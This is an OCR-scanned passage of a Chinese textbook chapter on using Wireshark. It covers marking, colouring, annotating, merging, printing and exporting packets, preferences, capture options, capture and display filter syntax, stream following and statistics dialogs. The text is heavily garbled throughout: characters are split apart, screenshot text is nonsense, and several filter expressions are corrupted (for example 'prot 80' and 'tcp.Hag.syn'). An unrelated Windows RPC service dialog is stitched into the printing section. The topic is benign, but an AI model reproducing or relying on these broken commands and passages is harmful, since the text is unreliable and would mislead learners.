设置 /取消 设置 时 间 参 考 
时 间 平 移 .… 
分 组 注释 ... 
编辑 解析 的 名 称 


step 国 Wireshark 会 给 出 地 址 解析 库存 放 的 位 
置 ， 然 后 单 击 “ 统 计 ” 菜 单项 ， 在 弹出 的 
菜单 中 选择 “已 解析 的 地 址 ”菜单 命令 ， 
如 下 图 所 示 。 
捕获 文件 属性 
已 解析 的 地 址 
协议 分 级 (P) 
对 话 
| 六 点 
| 分 组 长 度 
I/O 图 表 (!) 


Ctrl+Alt+Shift+C 


[sp 图 打开 下 图 所 示 的 对 话 框 ， 里 面 存放 
了 已 经 解析 的 地 址 信息 。 通 过 对 名 称 的 解 
析 ， 对 于 数据 包 的 来 源 去 处 会 更 加 清晰 明 
了 ， 所 以 名 称 解析 是 一 个 非常 好 的 功能 。 


Wireshark . 解析 后 的 地 址 .Ampjwireshark -any-20181010054212_7Ln5sa.pcapng 他 


# 在 /tmpywireshark_any_29161916954212_7Ln58a.pcapng 中 扫 到 的 解析 后 的 地 址 “ 
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Cr 


显示 -| | Scancet || voxr | 


侈 注意 : 如 果 开 启 名 称 解析 可 能 会 对 性 
能 带 来 损耗 ， 同 时 地 址 解析 不 能 保证 全 
部 正确 ， 如 果 数据 流 比较 大 建议 不 开启 名 
称 解析 ， 在 对 抓 取 的 数据 包 处 理 时 再 进行 
解析 。 


7.2.2 ”数据 包 操作 


数据 包 操作 是 Wireshark 的 主要 功能 ， 
获取 数据 包 后 ， 用 户 可 以 对 数据 包 进 行 标 
记 、 注 释 、 合 并 、 打 印 以 及 导出 等 操作 。 


1. 标记 数据 包 


标记 数据 包 可 以 实现 对 比较 重要 的 数 
据 包 进行 标记 ， 同 时 还 可 以 修改 数据 包 显 
示 颜 色 。 标 记 数 据 包 的 操作 步骤 如 下 : 
[Eee 国 在 需要 进行 标记 的 数据 包 上 ， 右 击 ， 
在 弹出 的 菜单 中 选择 “标记 /取消 标记 分 
组 ”菜单 命令 ， 如 下 图 所 示 。 
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标记 /取消 标记 分 组 (M) 
忽略 /取消 忽略 分 组 小 
设置 /取消 设置 时 间 参 考 
时 间 平 移 - 

分 组 注释 -. 


step 贺 标记 后 的 数据 包 会 进行 高 亮 显示 ， 变 
en 如 
下 图 所 示 。 


2. 修改 颜色 


为 了 区 分 不 同 的 数据 包 ，Wireshark 提 

供 了 对 数据 包 进 行 区 分 颜色 的 设置 ， 具 体 
操作 步骤 如 下 : 
在 数据 包 上 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “对 话 着 色 ” 菜 单 命令 ， 如 下 图 所 
示 ， 即 可 完成 对 数据 包 着 色 的 操作 ， 这 个 
操作 只 针对 此 次 抓 包 有 效 。 

作为 过 滤器 应 用 

准备 过 滤器 

对 话 过 滤器 

对 话 着 色 
[sep 图 如 果 想 要 给 数据 包 添 加 永久 性 的 着 色 
效果 ， 用 户 可 以 单 击 “视图 ”菜单 ， 在 弹 
出 的 菜单 列表 中 选择 “着 色 规则 ”菜单 命 


三 着 色 分 组 列表 
着 色 规 则 (C)- 
对 话 着 色 ， 各 
[BE 国 打开 下 图 所 示 的 对 话 框 ， 在 其 中 修改 “ 
数据 包 的 颜色 ， 从 这 里 修改 的 颜色 规则 将 
会 永久 保存 。 


Wireshark.Coioring Rules Defauit 9 
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侈 提示 : 默认 情况 下 ，Wireshark 提 供 的 颜 
色 规 则 可 以 满足 用 户 的 需求 ， 如 果 不 是 特 
殊 需要 不 建议 永久 修改 数据 包 的 颜色 。 


3. 修改 列表 项 颜色 


具体 的 操作 步骤 如 下 : 
[see 团 双击 需要 修改 的 列表 项 ， 下 方 会 出 
现 “ 前 景 ” 和 “背景 ”两 个 按钮 ， 如 下 图 
所 示 。 


Wireshark Colering Rules Defautt 9 


单 击 “ 前 景 ”或 “背景 ”按钮 ， 会 弹 
出 “选择 颜色 ”对 话 框 ，Wireshark 提 供 了 
丰富 的 颜色 。 当 然 如 果 有 需要 还 可 以 自 定 
义 颜 色 ， 如 下 图 所 示 。 


4. 添加 注释 


Wireshark 提 供 对 数据 包 注 释 的 功能 ， 
在 实际 操作 中 如 果 感 觉 这 个 数据 包 有 问题 
或 者 比较 重要 ， 可 以 添加 一 段 注释 信息 ， 
具体 操作 步骤 如 下 : 
[step 图 右 去 需要 添加 注释 信息 的 数据 包 ， 在 
弹出 的 快捷 菜单 中 选择 “分 组 注释 ”菜单 
命令 ， 如 下 图 所 示 。 


标记 /取消 标记 分 组 (M) 


分 组 注释 
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[step 图 这 时 会 弹出 下 图 所 示 的 对 话 框 ， 在 其 
中 输入 相应 的 注释 。 添 加 注释 信息 后 下 方 
的 解读 列表 也 会 出 现 这 段 注释 信息 ， 以 方 
便 用 户 查 看 。 


Wireshark .Packet5Comment ©@ 


四 Hetp 


SCancel | voKk 


5. 合并 数据 包 


在 实际 抓 包 过 程 中 ， 如 果 网 络 流量 比 
较 大 ， 不 停止 抓 包 操作 ， 可 能 会 出 现 抓 包 
工具 消耗 掉 所 有 内 存 ， 最 终 导致 系统 崩溃 
的 状态 。 为 解决 这 个 问题 ， 用 户 可 以 采取 
分 段 抓 取 ， 生 成 多 个 数据 包 文件 ， 最 后 为 
了 整体 分 析 ， 再 将 这 些 分 段 数据 包 合 并 成 
一 个 包 。 合 并 数据 包 的 操作 步骤 如 下 : 
[step 国 | 选择 “文件 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “合并 ”菜单 命令 ， 如 下 图 
所 示 。 


打开 Ctrl+O 
打开 最 近 

合并 (M)- 

从 Hex 转 储 导 入 (1).… 

关闭 Ctrlt+W 


[es 图 打开 “合并 捕获 文件 ”对 话 框 ， 在 其 
中 选择 需要 合并 的 文件 ， 即 可 完成 合并 数 
据 包 的 操作 ， 如 下 图 所 示 。 


Wireshark .合并 捕获 文件 © 
查看 : 六 /root/Downloads "| +w4 和 3 区 
国 计算 机 名 称 ”大 小 类 型 
图 root mount-shared-folders.sh 291 字 节 sh File 


restart-vm-tools.sh 130 字 节 sh File 


全 tcp.pcapng 1.02 MiB pcap...File 
文件 名 称 (N) : | 
SCancel 
文件 类 骨 : 。 AllFiles -|| BHetp 
本 年 分 组 
9 按时 间 长 合并 
追加 分 组 
读 取 过 滤器 : ”Apply aread filter 


6. 打印 数据 包 


Wireshark 提 供 了 数据 包 打 印 功能 ， 可 
以 将 比较 重要 的 数据 包 进行 打印 。 打 印 数 
据 包 的 操作 步骤 如 下 : 
step 加 选择 “文件 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “打印 ”菜单 命令 ， 如 下 图 
所 示 。 


导出 SSL 会 话 密 钥 .… 

导出 对 象 

打印 (P)... Ctrl+P 
退出 Ctrl+Q 


step 图 弹出 “打印 ”对 话 框 ， 在 该 对 话 框 中 
会 显示 此 次 打印 数据 包 的 一 些 信息 ， 包 括 
缩 略图 、 概 要 等 ， 如 下 图 所 示 。 


Remote Procedure Call (RPC) 的 属性 (本 地 计算 机 ) x 


常规 。 登录 。 恢复 。 依存 关系 


票 些 服务 依赖 于 其他 服务 、 系 统 狗 动 程序 或 加 载 顺序 给 .如果 有 村 个 系统 组 件 被 停 
止 或 运行 不 正常 ， 依 敖 于 它 的 服务 会 受到 影响 , 


Remote Procedure Call (RPC) 


此 服务 依 吉 以 下 系统 组 件 (T): 
RPC Endpoint Mapper 


以 下 系统 组 件 依 如 此 服务 (月 : 

ActiveX Installer (AxinstSV) ~ 
由 - 苞 Application Identity 

总 Application Information 

由 - 苞 AppX Deployment Service (AppXSVC) 

-六 Background Intelligent Transfer Service 

ackground Tasks Infrastructure Service 


7. 导出 数据 包 


Wireshark 提 供 了 数据 包 导 出 功能 ， 用 
户 可 以 进行 筛选 导出 ， 还 可 以 通过 分 类 导 
出 ， 还 可 以 只 导出 选中 数据 包 。 导 出 数据 
包 的 操作 步骤 如 下 : 
[see 选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 
列表 中 选择 “导出 特定 分 组 ”菜单 命令 ， 
如 下 图 所 示 。 
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导出 特定 分 组 ~- 
导出 分 组 解析 结果 
导出 分 组 字 节 流 (B)- 
导出 PDU 到 文件 ~ 
导出 SSL 会 话 密 钥 .. 
导出 对 象 


[step 图 弹出 “导出 特定 分 组 ”对 话 框 ， 在 其 
中 可 以 选择 导出 数据 包 的 名 字 ， 并 设置 导 
出 范围 是 所 有 分 组 还 是 仅 选 中 分 组 ， 如 下 
图 所 示 。 


Ctrl+Shift+X 


Wireshark. 导出 特定 分 组 © 
查看 电 /rooUDownloads "+ >» 4 和 和 时 
大 计算 机 名称 了 大 小 类 型 日 期 让 
国 oot tppcapng 1.02 MiB pcap--File 2018/1 
or 
文件 名 称 (N) : | | 
S Cancel 
导出 为 : Wireshard)... - pcapng "| BHep 
分 组 范围 用 gzip 压 编 (Z| 
已 捕获 5 已 显示 
。 所 有 分 组 A) 3315 
仅 选 中 分 组 (S) a 
苑 转 [R 0 


[step 图 如 果 选 择 “ 导 出 分 组 解析 结果 ”菜单 
命令 ， 可 以 将 数据 包 导 出 不 同 的 格式 ， 如 
下 图 所 示 。 如 可 以 是 使 用 Excel 查 看 的 CSV 
格式 、 使 用 记事 本 查看 的 纯 文 本 格式 ， 还 
可 以 将 数据 包 导 出 为 C 语 言 数组 、XML 数 
据 、JSON 数 据 等 格式 。 


为 CSV.. 
为 上 C 语言 数组 .… 
为 PSMLXML. 
为 PDMLXML. 
为 JSON. 


7.2.3 首选 项 设置 


大 多 数 软件 都 会 提供 一 个 首选 项 设 曾 
置 ， 该 设置 主要 用 于 配制 软件 的 整体 风 
格 ，Wireshark 也 提供 了 首选 项 设置 。 进 行 
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首选 项 设置 的 操作 步骤 如 下 : 
step 因 | 选择 “编辑 ”菜单 项 ， 在 弹出 的 菜单 


列表 中 选择 “首选 项 ”菜单 命令 ， 如 下 图 
所 示 。 
分 组 注释 Ctrl+AIt+C 
Delete All Packet Comments 
配置 文件 - Ctrl+Shift+A 
“首选 项 P)- Cottshin+p | 


[step 图 打开 “首选 项 ”对 话 框 ， 如 下 图 所 
示 。 首 次 打开 “首选 项 ”对 话 框 后 ， 在 默 
认 打 开 的 界面 中 ， 用 户 可 以 进行 相关 选项 
的 设置 。 


Wireshark ,首选 咀 


了 记 仁 主 面 ] 的 大 小 及 位 置 
“打开 文件 赤 中 的 文件 
最 近 使 用 的 文件 实 

该 文件 内 
nn 县 示 电 多 

10 这 灶 器 项 目 

10 个 最 近 文件 
确认 娄 保 的 坟 区 文件 
主 工具 愉 习 式 ， 只 有 图 标 ~ 
请 于 使用 所 弹 训 置 


EEN 


cancel YOK 


“首选 项 ”对 话 框 中 相关 参数 的 介绍 
如 下 : 

e “ 记 住 主 窗口 的 大 小 及 位 置 ” 复 选 
框 : 选中 之 后 ， 每 次 打开 都 将 是 固 
定 大 小 。 
“打开 文件 夹 中 的 文件 ”: 设置 默 
认 打 开 或 保存 文件 的 路 径 ， 如 果 经 
常 抓 取 数 据 包 ， 建 议 设置 一 个 固定 
的 位 置 。 
“显示 最 多 ”: 显示 数据 包 条 目 ， 
根据 实际 需要 进行 设置 即 可 。 
“确认 未 保存 的 捕获 文件 ” 复 选 
框 : 选中 之 后 ， 没 有 保存 的 文件 名 
前 面 会 多 出 一 个 “* ”号 ， 提 示 用 户 
没有 保存 ， 一 般 建议 开启 。 
“ 主 工具 栏 的 样式 ”: 这 里 有 三 种 样 
式 供 选 择 ， 即 只 有 图 标 、 只 有 文本 、 
图 标 加 文本 ， 根 据 需要 选择 即 可 。 
“语言 ”: 设置 语言 环境 ， 这 里 可 
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以 选择 多 种 国家 语言 ， 如 果 英 文 较 
好 可 以 切换 成 英文 状态 。 
ESG 图 在 “首选 项 ”对 话 框 中 ， 选 择 
Columns 项 ， 然 后 单 击 左下 方 的 “+” 按 钮 
可 以 添加 一 个 列 ， 单 击 “-” 按 钮 可 以 删除 
一 个 列 ， 如 下 图 所 示 。 


as specified) 
lan， 


ion address 


il ngth (bytes) 
fo Information 


+ 


选择 Font and Colors 项 ， 在 打开 界面 
中 可 以 设置 软件 字体 大 小 以 及 默认 颜色 ， 
如 下 图 所 示 。 

主 饥 口 字体: Uberation Mono 11.0 


Lazy badgers move unique waxy jellyfish packets 0123456789 
新 名: 


ina | 
| 


本 图 。。" 计 耻 到 所 法 "客户 并 未 克文 本 

国生 | 过 下 下 二 元" 拔 务 可 示 而 文 二 
有 效 过 波 吕 示例 l 
| 天 交 过 沪 器 直 例 | 
(Sample werning filter | 


[Step 图 选择 Layout 项 ， 在 打开 的 界面 中 可 
以 设置 软件 显示 布局 ， 该 项 还 是 比较 重要 
的 ， 默 认 情 况 下 ， 软 件 选择 的 是 分 3 横 显 
示 ， 根 据 个 人 喜好 可 以 选择 不 同 的 布局 方 
式 进 行星 示 ， 如 下 图 所 示 。 


I 有 1 日 J 
- Ts a E 2 


窗 格 二 窗 格 2 窗 格 2: 

分 组 列表 分 组 列表 分 组 列表 
分 组 详 倩 分 组 详情 分 组 详情 
分 组 字 节 流 分 组 子 书 流 分 组 字 节 流 
无 无 无 


Packet List settings 
Show packet separator 
状态 栏 设置 : 
Show selected packet number 
显示 文件 加 载 时 间 
Restore Defaults 


7.2.4 捕获 选项 


捕获 选项 主要 针对 抓 取 数 据 包 使 用 的 
网 卡 、 抓 包 前 的 过 滤 、 抓 包 大 小 、 抓 包 时 
长 等 进行 设置 。 这 个 功能 在 抓 包 软 件 中 也 
属于 非常 重要 的 一 个 设置 。 


1. 进行 捕获 选项 设置 

进行 捕获 选项 设置 的 操作 步骤 如 下 : 
[se 四 选择 “捕获 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “选项 ”菜单 命令 ， 如 下 图 
所 示 。 


| 加 选项 (O)- 
| 开始 (5) 


CtrltK 
Ctrl+E 


捕获 过 滤器 (F).… 

| 刷新 接口 列表 F5 
[se 加 打开 “捕获 接口 ”对 话 框 ， 默 认 选 中 
“输入 ”选项 卡 ， 其 中 混杂 模式 为 选中 状 
态 ， 该 项 需要 选中 否则 可 能 抓 取 不 到 数据 
包 ， 列 表 中 列 出 网 卡 相关 信息 ， 选 择 相应 
的 网 卡 可 以 抓 取 数 据 包 ， 如 下 图 所 示 。 


罗锅 出 要 加 
要 En 


性 导入 


上 全 用 
PE 


BBtep 图 在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 输 
出 ”选项 卡 ， 在 其 中 可 以 设置 文件 保存 的 
路 径 、 输 出 格式 、 是 否 自动 创建 新 文件 
等 ， 如 下 图 所 示 。 


BLELEEL 


妆 伯 ;001 3 


二 出 格式 -5 pcapng peap 
自动 他 了 新 文件 ,经 这- 


SE 
i 加 


使 用 一 个 环形 缓冲 加 ,采用 |2 。 文件 


默认 “自动 创建 新 文件 ” 复 选 框 未 被 
选中 ， 选 中 后 可 以 指定 保存 规则 ， 有 3 种 规 
则 可 供 选 择 。 
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(1) 根据 抓 包 文件 的 大 小 ， 达 到 规定 
大 小 保存 更 换 下 一 个 文件 ， 保 存 文件 大 小 8 
可 以 调整 。 

(2) 根据 时 间 长 度 判断 ， 达 到 规定 时 
间 保 存 更 换 下 一 个 文件 。 例 如 ， 每 间隔 1 
分 钟 存储 一 个 文件 。 

(3) 循环 模式 ， 只 是 用 两 个 数据 包 ， 

初始 时 会 创建 两 个 数据 包 ， 当 需要 第 三 
数据 包 时 不 创建 而 替换 第 一 个 数据 包 ， 
依次 循环 。 
[step 园 在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 选 
项 ”选项 卡 ， 在 其 中 可 以 设置 显示 选项 、 
解析 名 称 、 自 动 停止 捕获 等 参数 ， 如 下 图 
所 示 。 


显示 选项 解析 名 称 
V 实时 更 新 分 组 列表 V MAC 地址 解析 
Y 实时 捕获 时 自动 滚屏 解析 网 络 名 称 
解析 传输 层 名 称 
自动 停止 捕获 ， 在 经 过 -. 
1 -分 组 
1 间 文 件 


1 2 秒 


侈 提示 : 这 里 的 自动 停止 捕获 规则 ， 相 当 
于 一 个 定时 器 的 作用 ， 当 符合 条 件 后 停止 
抓 包 ， 可 以 同 多 文件 保存 功能 配合 使 用 。 
例如 : 设置 每 1MB 保 存 一 个 数据 包 ， 符 合 
10 个 文件 后 停止 抓 包 。 


2. 数据 包 的 过 滤 设 置 


Wireshark 抓 包 过 滤 是 基于 libpcap/ 
Winpcap 库 实现 的 ， 所 以 遵循 BPF (Berke- 
ley Packet Filter) 语法 ， 其 中 包括 类 型 

(Type) 、 方 向 (Dir) 、 协 议 (Proto) 、 
逻辑 运算 符 。 

e@ 类 型 : host、net、port。 

e@ 方向 : src、dst。 

e@ 协议 : 

fp 等 。 


ether、ip、tcp、udp、http、 
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e 逻辑 运算 符 ，&& 与 、|| 或 、! 非 。 

例如 : 想 要 抓 取 源 地 址 位 192.168.0.100 
目的 地 端口 为 80 的 流量 ， 过 滤 语 句 为 : 
(src host 192.168.0.100 && dst port 
80) ; 想 要 抓 取 IP 地 址 192.168.0.100 和 
192.168.0.101 的 流量 ， 过 滤 语 句 为 : (host 
192.168.0.100 || host 192.168.0.101) ; 想 
要 抓 取 除 广播 外 的 所 有 包 ， 过 滤 语 句 为 : 


(! broadcast) 。 


3. 开始 捕获 数据 包 

(1) 过 滤 MAC 地 址 。 过 滤 的 语法 格 
式 为 : 

ether host < 需要 过 滤 的 MAC 地 址 > 


ether src host <MRC 地 址 > 
ether dst host <MRC 地 址 > 


例如 : 对 MAC 地 址 过 滤 ， 可 以 在 “所 
选择 接口 的 捕获 过 滤器 ”文本 框 中 输入 如 
下 图 所 示 的 语句 。 


M 在 所 有 接口 上 使 用 泥 杂 模式 
所 过 择 手 口 的 独 获 过 起 晨 


ethersrcf 63cd336073 画 - 


侈 提示 : 如 果 过 滤 字 段 输入 错误 ， 则 背景 
色 是 红色 ， 输 入 正确 则 是 绿色 。 
(2) 过 滤 了 他 地 址 。 过 滤 的 语法 格式 为 : 


host < 需 过 滤 的 IP 地 址 > 
src host <IP 地 址 > 
dst host <IP 地 址 > 


例如 : 对 IP 地 址 过 滤 ， 可 以 在 “所 选 
择 接口 的 捕获 过 滤器 ”文本 框 中 输入 下 图 
所 示 的 语句 。 


Le 于 
(3) 过 滤 端 口 。 过 滤 的 语法 格式 为 : 


prot 80、! prot 80、 dst port 80、src 
port 80 


过 滤 协 议 为 : atp、icmp、http。 

例如 : 综合 过 滤 地 址 与 端口 ， 可 以 在 
“所 选择 接口 的 捕获 过 滤器 ”文本 框 中 输 
入 下 图 所 示 的 语句 。 
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在 所 有 村口 上 合用 下 条 模 式 
所 迁 反 接口 的 捕获 过 凑 器 : [host192168.01005& port 808d| 画 "] 


侈 提示 : 抓 包 过 滤 一 旦 设置 后 将 只 抓 取 符 
合 规则 的 数据 包 ， 这 样 会 过 滤 掉 大 量 干扰 
数据 包 ， 从 而 提高 抓 包 数据 的 准确 率 。 


4. 过 滤 数 据 包 


显示 过 滤器 与 抓 包 过 滤 类 似 ， 显 示 过 
滤器 是 在 已 经 抓 取 的 数据 包 中 过 滤 ， 显 示 
出 需要 的 数据 包 ， 在 快捷 方式 的 下 方 有 一 
个 可 以 输入 表达 式 的 地 方 ， 如 下 图 所 示 。 
在 这 里 输入 相应 的 表达 式 即 可 过 滤 。 


OCR | 


显示 过 滤 的 语法 设置 规则 如 下 : 

e 比较 操作 符 : == 等 于 、! = 不 等 
于 、> 大 于 、< 小 于 、>= 大 于 等 于 、 
<= 小 于 等 于 。 

e 逻辑 操作 :and 与 操作 、or 或 操作 、 
xor 异 或 操作 、not 非 操作 。 

e ”IP 地 址 : ip.addr、ip.src、ip.dst。 

e 过滤 端 口 : tcp.port、tcp.srcport、 
tcp.dstport、 tcp.flat.syn、 tcp.flag. 
ack。 

e 过 滤 协 议 : arp、ip、icmp、upd、 
tcp、bootp、dns 等 。 

例如 : 想 要 过 滤 满 足以 下 条 件 的 数据 

其 中 ，IP 地 址 如 下 设置 : 

ip.addr == 192.168.1.1 

ip.sre 一 192.168.1.1 

ip.dst == 192.168.1.1 

lp.src == 192.168.1.100 and ip.dst == 

58.106.127.80 


仿 


端口 如 下 设置 : 
tcp.port =— 80 
tcp.srcport 一 80 
tcp.dstport == 80 
tcp.Hag.syn 一 1 
过 滤 协 议 如 下 : 


arp、tcp、udp、not http、not arp 


下 面 给 出 一 个 综合 过 滤 的 语句 ， 其 中 
筛选 了 IP 地 址 为 192.0.2.1 并 且 不 是 从 tcp 协 
议 80、25 端 口 发 出 的 包 。 下 图 为 输入 的 表 
达 式 。 

AAO 

(lipaddr == 192.0.2.1and not tcp.port in {80 25) 

问题 : 什么 情况 使 用 抓 包 过 滤 ? 什么 
情况 使 用 显示 过 滤 ? 

如 果实 际 网 络 数 据 流 量 比较 大 ， 并 
且 已 经 锁定 数据 包 类 型 可 以 使 用 抓 包 过 滤 
器 。 一 般 如 果 没 有 特殊 需求 建议 使 用 整体 
抓 包 ， 然 后 再 进行 显示 过 滤 ， 保 证 一 个 真 
实 的 网 络 环境 ， 根 据 需要 再 进行 筛 分， 这 
样 分 析 数 据 包 效 果 会 更 好 。 


高 级 操作 


高 级 操作 是 将 捕获 的 数据 包 以 更 直观 
的 形式 展现 出 来 ， 学 会 如 何 使 用 这 些 高 级 
技能 ， 对 于 以 后 的 数据 包 处 理会 更 加 得 心 
应 手 。 


7:3 


7.3.1 分 析 数 据 包 


分 析 数 据 包 主要 包括 数据 追踪 与 专家 
信息 两 方面 内 容 ， 它 们 都 属于 “分 析 ” 菜 
单 下 的 功能 。 


1. 数据 追踪 


正常 通信 中 如 TCP、UDP、SSL 等 数 
据 包 都 是 以 分 片 的 形 发 送 的 ， 如 果 在 整个 
数据 包 中 分 片 查看 数据 包 不 便于 分 析 ， 使 
用 数据 流 追 踪 可 以 将 TCP、UDP、SSL 等 
数据 流 进行 重组 ， 以 一 个 完整 的 形式 呈现 
出 来 。 

打开 追踪 流 有 两 种 方式 : 

第 1 种 方式 : 在 数据 流 显示 列表 中 ， 选 
择 需 要 追踪 的 数据 流 ， 右 击 ， 在 弹出 的 快 
捷 菜 单 中 选择 “追踪 流 ” 菜 单 命令 ， 如 下 
图 所 示 。 
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SCTP 
迄 踪 流 
复制 "| 


第 2 种 方式 : 选择 “分 析 ” 菜 单 ， 在 
弹出 的 菜单 列表 中 选择 “追踪 流 ” 菜 单 命 
令 ， 如 下 图 所 示 。 


重新 载 入 Lua 插件 | 
scm 
追踪 流 


以 上 两 种 方式 都 可 以 打开 “追踪 流 ” 界 
面 ， 如 下 图 所 示 。 从 这 里 可 以 清晰 地 看 到 这 
个 协议 通信 的 完整 过 程 ， 其 中 发 送 请 求 会 以 
红色 显示 ， 服 务 器 返回 结果 会 显示 为 蓝 色 。 


Wireshark 过 申 TCP 乏 fcpstreameqol tcppcapng eee 
Linwx x80_64; rvi68.6) Gecko/29100101 Firefox/60.0 
5 
hy 2817 18:84:40 GNT 
deb7d28986123" 
appacnxzehtlybkh2aoHZXShTNPtIMivqkqS4aAASA= 
ofe, mst-revalidate 
4 CHT 
Xl: Linux x86 64; rv:69.0) Gecko/20106101 Firefox/60,0 - 
Nthre cx at 显示 和 保存 数据 为 AsCI ~ 流 0 
si FT 


Qe 3 上 说 打印 | swas- 天 四 || wclow 


2. 专家 信息 


专家 信息 可 以 对 数据 包 中 特定 状态 
进行 警告 说 明 ， 其 中 包括 错误 信息 (er- 
rors) 、 和 警告 信息 (warnings) 、 注 意 信息 
(notes) 以 及 对 话 信 息 (chats) 。 查 看 专 
家 信息 的 操作 步骤 如 下 : 
[Sep 加 选择 “分 析 ” 菜 单项 ， 在 弹出 的 菜单 
列表 中 选择 “专家 信息 ”菜单 命令 ， 如 下 
图 所 示 。 


SCTP | 
追踪 流 | 


[| 
step 较 打开 “专家 信息 ”对 话 框 ， 如 下 图 所 
示 。 其 中 错误 信息 会 以 红色 进行 标注 ， 警 
告 信 息 以 黄色 进行 标注 ， 注 意 信息 以 浅 蓝 
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色 进 行 标注 ， 正 常 通信 以 深蓝 色 进 行 标注 ， 每 一 种 类 型 会 单独 列 出 一 行进 行 显示 ， 通 过 专 
家 信息 可 以 更 直观 地 查看 数据 通信 中 存在 哪些 问题 。 
wireshark 专家 信息 -tcp pcspng eeoe 


~ Summary Group 协议 计数 


Severty 


而 这，p sream eq 0” 


显示 这 次 加 的 限制 。 了 搜捕 要 分 组 。 报 索 : 星 示 -~ 
BHep xClose 


如 7.3.2 ”统计 数据 包 

通过 对 数据 包 的 统计 分 析 ， 可 以 查看 更 为 详细 的 数据 信息 ， 进 而 分 析 网 络 中 是 否 存在 
安全 问题 。 查 看 数据 包 统计 信息 的 操作 步骤 如 下 : 

step 轩 | 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “捕获 文件 属性 ”菜单 命令 ， 打 开 “ 捕 
获 文件 属性 ”对 话 框 ， 在 其 中 可 以 查看 文件 、 事 件 、 捕 获 、 接 口 等 信息 ， 如 下 图 所 示 。 


Wireshark . 擅 获 文件 属性 .tcp.pcapng 998 

细节 

文件 

名 称 : /root/Downloads/tep.pcapng 

长 六 : 41070kB 

格式 : Wireshark/.。- pcapng 

封装 : Ethernet 

时 间 

第 一 个 分 组 : 2018-10-10 21:43:23 

最 后 分 组 : 2018-10-1021:45:39 

经 过 时 间 : 00:02:16 

捕获 

硬件 : AMD Phenom(tm) I1X6 1090T Processor 

oOs: Linux 4.18.0-calil-amd64 

应 用 : Dumpcap (Wireshark) 2.6.3 (Git v2.6.3 packaged as 2.6.3-1) 

接口 

接口 委 痉 分 组 找 获 过 滤器 链 路 类 型 分 组 大 小 限制 
wlanO 0(0%) 3 Ethernet 262144 字 节 

HH 

捕获 文件 描述 

加 Hetp | a 新 复制 到 和 贴 板 | 闪 Close | 中 保存 注释 


step 图 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “协议 分 级 ”菜单 命令 ， 打 开 “ 协 
议 分 级 统计 ”对 话 框 ， 如 下 图 所 示 。 从 这 里 可 以 统计 出 每 一 种 协议 在 整个 数据 包 中 的 占 
有 率 。 
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eee 
FR MR Ep ErdByee Endas 
55547 55k 0 o 0 
46410 2723 0 9 0 
中 日 9 9 
5 2 所 了 
56200 3885 0 9 o 
2B2 D0 9 9 9 
56 1 了 3 yy 
25531 1498 -357 25531 L498 
e601 Tk 2455 01463 35% 
183994 0K 338 155749 3141 
0 0 3 0 上 
3 202 934os Hk 可 S96 50 
nine Cerameate Satus Protecal 02 昌 ol 1266 74 5 55 
Meda Type 02 7 45 2583 2505 了 45574 2674 
Lne Sacrd to da 4 也 153 145915 &622 。 与 4。 4744 
am ou z 03 2 157 2 2 
namet Control Mesaage Protocol 0 3 00 3l6 。 所 3 6 8 
erese Rocolation Protorol 01 3 9 再 3 到 1 
Br Erm 


step 图 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “对 话 ” 菜 单 命令 ， 打 开 下 图 所 示 
的 对 话 框 ， 其 中 包括 以 太 网 、IPv4、IPv6、TCP、UDP 等 不 同 协议 会 话 信息 展示 。 


esian Comersations ppaapmg eee 
Eee 3 pve-30 | 6 | TcP-E Uop-127 

IC TOORCIIRCTIRCTIRCTZRCTTRCTTCT 
333300000016 ede0628a 46 2 1 6 了 00 57976723 09841 
Bte 06 28 mA 483ed336073 S510 953k 1g05 I os Tan ao00000 1363053 
ee 3 3 1 0 4020 #0 0049 

rm NRT Comereton eo 
neo [se 


[step 园 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “端点 ”菜单 命令 ， 打 开 下 图 所 示 
的 “端点 ”对 话 框 ， 其 中 包含 以 太 网 和 各 种 协议 选项 。 


Wireshark , Endpoints .tcp.pcapng ee9e 


Ethernet. 4 ，IPv4.31 IPv6:2 TCP-:145 UDP-133 
了 Packets Bytes TxPackets TxBytes RxPackets RxBytes 


00:16 2 180 0 0 2 180 

e:46 3312 958« 1807 178k 1505 780k 

0:73 3313 958« 1508 780k 1805 177k 

» 126 0 0 3 126 

解析 名 称 显示 过 滤器 的 限制 Endpoint 类 型 ~ 


BHelp 复制 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “分 组 长 度 ” 菜 单 命令 ， 打 开 下 图 
所 示 的 “分 组 长 度 ” 对 话 框 。 这 里 可 以 对 不 同 大 小 数据 包 进行 统计 。 


Wireshark , Packet Lengths .tcp.pcapng ee 

Topic / Item ~ Count Average Min val Max val Rate (ms) Percent Burst rate Burst start 
~ Packetlengths 3315 289.15 42 1514 0.0243 100% 16200 134.305 

0-19 0 - - - 0.0000 0.00% - - 

20-39 0 - - - 0.0000 0.00% - - 

40-79 2122 63.50 42 79 0.0156 64.01%14500 134.342 

80-159 372 105.34 80 159 0.00277 1122% 0.1200 77.159 

160-319 150 213.17 160 312 0.0011 4.52% 0.0500 131.903 

320-639 173 47935 323 625 0.00B 5.22% 0.0600 90.234 

640-1279 108 867.93 640 1270 0.0008 3.26% 0.0400 65.397 

1280-2559 390 1476.871306 1514 0.0029 1176% 0.1400 131.015 

2560-5119 0 - - - 0.0000 0.00% - 

5120and greater0 = - - - 0.0000 0.00% - 


星 示 过 滤器 : Entera display filter 

复制 | 另存 为 -| XClose 
step 图 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “IO 图 表 ” 菜 单 命令 ， 打 开 下 图 所 
示 的 “IO 图 表 ” 对 话 框 ， 其 中 包括 一 个 坐标 轴 显 示 的 图 表 ， 下 方 可 以 添加 任意 的 协议 ， 
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也 可 以 选择 协议 显示 的 颜色 ， 还 可 以 调整 坐标 轴 的 刻度 。 


Packetsl1 秒 


Wireshark.IO 图 各 .tcppcapng 


Wireshark10 图 表 : tcp.pcapng 


eae 


疝 天 革职 分 得 3048 131s = 70) 
Enabled 
